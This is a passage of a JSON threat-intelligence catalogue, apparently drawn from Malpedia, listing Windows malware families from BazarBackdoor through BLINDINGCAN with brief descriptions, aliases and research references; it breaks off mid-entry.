"https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration", "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day", "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/", "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", "https://johannesbader.ch/blog/yet-another-bazarloader-dga/", "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/", "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader", "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I", "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II", "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", "https://twitter.com/anthomsec/status/1321865315513520128", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/", "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.scythe.io/library/threatthursday-ryuk", "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/", "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles", "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor", "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/" ], "synonyms": [ "BEERBOT", "BazarCall", "KEGTAP", "Team9Backdoor", "bazaloader" ], "type": [] }, "uuid": "3b1a6ba7-9617-4413-a4ad-66f5d9870bb7", "value": "BazarBackdoor" }, { "description": "A rewrite of Bazarloader in the Nim programming language.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod", "https://twitter.com/James_inthe_box/status/1357009652857196546", "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811" ], "synonyms": [], "type": [] }, "uuid": "1735a331-9ca9-49b6-a5aa-0ddac9db8de6", "value": "BazarNimrod" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae", "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [], "type": [] }, "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, { "description": "360 Security Center describes BBtok as a banking trojan targeting Mexico.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok", "https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/" ], "synonyms": [], "type": [] }, "uuid": "0b114f49-8c4d-425d-8426-a0c4ab145f36", "value": "BBtok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy", "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china" ], "synonyms": [], "type": [] }, "uuid": "404e8121-bced-4320-a984-2b490fad90f8", "value": "Beapy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" ], "synonyms": [], "type": [] }, "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", "value": "Bedep" }, { "description": "Malware family observed in conjunction with PlugX infrastructure in 2013.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee", "https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfffe201c5bedefe260d22ac908/detection" ], "synonyms": [], "type": [] }, "uuid": "2d4aacb7-392a-46fd-b93d-33fcdaeb348f", "value": "Bee" }, { "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "1732faab-2cf9-4d79-a085-6331da008047", "value": "BeepService" }, { "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard", "https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0" ], "synonyms": [], "type": [] }, "uuid": "40c48c99-7d33-4f35-92f1-937c3686afa7", "value": "Belonard" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum", "https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/" ], "synonyms": [], "type": [] }, "uuid": "6944cbe7-db95-422d-8751-98c9fc4f0b12", "value": "Berbomthum" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", "https://securitykitten.github.io/2015/07/14/bernhardpos.html" ], "synonyms": [], "type": [] }, "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", "value": "BernhardPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bestkorea", "https://github.com/Jacquais/BestKorea" ], "synonyms": [], "type": [] }, "uuid": "33308a2c-b1ef-4cbb-9240-25cb6dce55a9", "value": "BestKorea" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", "http://www.xylibox.com/2015/04/betabot-retrospective.html", "https://news.sophos.com/en-us/2020/05/14/raticate/", "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" ], "synonyms": [ "Neurevt" ], "type": [] }, "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, { "description": "Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files. \r\n\r\nThe Trojan may perform the following actions: \r\nList, move, and delete drives\r\nList, move, and delete files\r\nList processes and running Windows titles\r\nList services\r\nList registry values\r\nKill processes\r\nMaximize, minimize, and close windows\r\nUpload and download files\r\nExecute shell commands\r\nUninstall itself", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "29f45180-cb57-4655-8812-eb814c2a0b0e", "value": "Bezigate" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" ], "synonyms": [], "type": [] }, "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", "value": "BfBot" }, { "description": "Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware", "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/", "http://zirconic.net/2018/07/bi_d-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "9f80bebb-dc5d-4cc1-b2dc-16bca1bbfaad", "value": "BI_D Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bifrose", "https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/", "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html" ], "synonyms": [], "type": [] }, "uuid": "47e654af-8b94-4b97-a2ea-6a28c1bc8099", "value": "bifrose" }, { "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html", "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", "https://habrahabr.ru/post/213973/", "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/" ], "synonyms": [], "type": [] }, "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, { "description": "Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx", "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" ], "synonyms": [], "type": [] }, "uuid": "a76a35e4-6ef7-45ad-9656-98584835d910", "value": "Binanen" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata", "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] }, "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7", "value": "BioData" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bioload", "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html" ], "synonyms": [], "type": [] }, "uuid": "04803315-fc17-44d0-839e-534b9da4c7fc", "value": "bioload" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "zxdosml" ], "type": [] }, "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", "value": "Biscuit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a" ], "synonyms": [], "type": [] }, "uuid": "fa8b2a91-ec55-41cc-b5f6-3d233cc3cc65", "value": "BISTROMATH" }, { "description": "Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user's Desktop with the following name: \"# # HELP_TO_DECRYPT_YOUR_FILES # .html\". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock", "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview", "https://twitter.com/malwrhunterteam/status/1215252402988822529", "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/" ], "synonyms": [], "type": [] }, "uuid": "da5adcc1-9adc-4e86-9034-08aafecc14c1", "value": "BitPyLock" }, { "description": "SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", "https://content.fireeye.com/apt/rpt-apt38", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf" ], "synonyms": [ "SHADYCAT" ], "type": [] }, "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan", "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] }, "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634", "value": "Bitter RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat", "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md", "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/" ], "synonyms": [], "type": [] }, "uuid": "8c4363f4-4f38-4a5a-bc87-16f0721bd03b", "value": "BitRAT" }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", "https://www.evild3ad.com/405/bka-trojaner-ransomware/" ], "synonyms": [ "bwin3_bka" ], "type": [] }, "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", "value": "BKA Trojaner" }, { "description": "a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://attack.mitre.org/software/S0069/", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/" ], "synonyms": [ "PNGRAT", "ZoxPNG", "gresim" ], "type": [] }, "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899", "value": "BLACKCOFFEE" }, { "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo “remote desktop”\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://threatconnect.com/blog/casting-a-light-on-blackenergy/", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", "https://securelist.com/black-ddos/36309/", "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/", "https://www.secureworks.com/research/blackenergy2", "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf" ], "synonyms": [], "type": [] }, "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", "value": "BlackEnergy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware", "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html", "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81", "value": "BlackKingdom Ransomware" }, { "description": "Advanced and modern Windows botnet with PHP panel developed using VB.NET", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat", "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html", "https://labs.k7computing.com/?p=21365", "https://github.com/BlackHacker511/BlackNET/", "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/", "https://github.com/FarisCode511/BlackNET/" ], "synonyms": [], "type": [] }, "uuid": "656c4009-cd79-4501-9fc9-7ad2d97b634c", "value": "BlackNET RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat", "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb" ], "synonyms": [], "type": [] }, "uuid": "845ce966-fb40-4f12-b9c1-8b97263a589e", "value": "BlackNix RAT" }, { "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" ], "synonyms": [ "Kaptoxa", "MMon", "POSWDS", "Reedum" ], "type": [] }, "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", "value": "BlackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/", "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/" ], "synonyms": [ "BlackRAT" ], "type": [] }, "uuid": "b1302517-d5c9-44bb-833d-4396365915db", "value": "BlackRemote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution" ], "synonyms": [], "type": [] }, "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter", "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/", "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/" ], "synonyms": [ "BLACKHEART" ], "type": [] }, "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79", "value": "BlackRouter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby", "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/", "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware" ], "synonyms": [], "type": [] }, "uuid": "617d53dd-1143-4146-bbc0-39e975a26fe5", "value": "Blackruby Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" ], "synonyms": [], "type": [] }, "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", "value": "BlackShades" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksoul", "https://quointelligence.eu/2021/01/reconhellcat-uses-nist-theme-as-lure-to-deliver-new-blacksoul-malware/" ], "synonyms": [], "type": [] }, "uuid": "58701e4d-87aa-45a5-adfd-9b20f50fea91", "value": "BlackSoul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat", "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html", "https://github.com/BlackHacker511/BlackWorm", "https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/" ], "synonyms": [], "type": [] }, "uuid": "02d2bb6d-9641-406e-9767-58aff2fad6c7", "value": "Blackworm RAT" }, { "description": "According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/", "https://www.hvs-consulting.de/lazarus-report/", "https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html" ], "synonyms": [ "DRATzarus RAT" ], "type": [] }, "uuid": "44d22b4e-5ad4-4f05-a421-95607706378d", "value": "BLINDINGCAN" }, { "description": "BLINDTOAD is 64-bit Service DLL that loads an encrypted file from disk and executes it in memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad", "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/", "https://content.fireeye.com/apt/rpt-apt38" ], "synonyms": [], "type": [] }, "uuid": "b34fd401-9d37-4bc6-908f-448c1697f749", "value": "BLINDTOAD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether", "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf" ], "synonyms": [ "CAPGELD" ], "type": [] }, "uuid": "cf542e2d-531c-4d34-98c8-7e3cb26a32af", "value": "BLUETHER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", "value": "Boaxxe" }, { "description": "", "meta": { "refs": [ 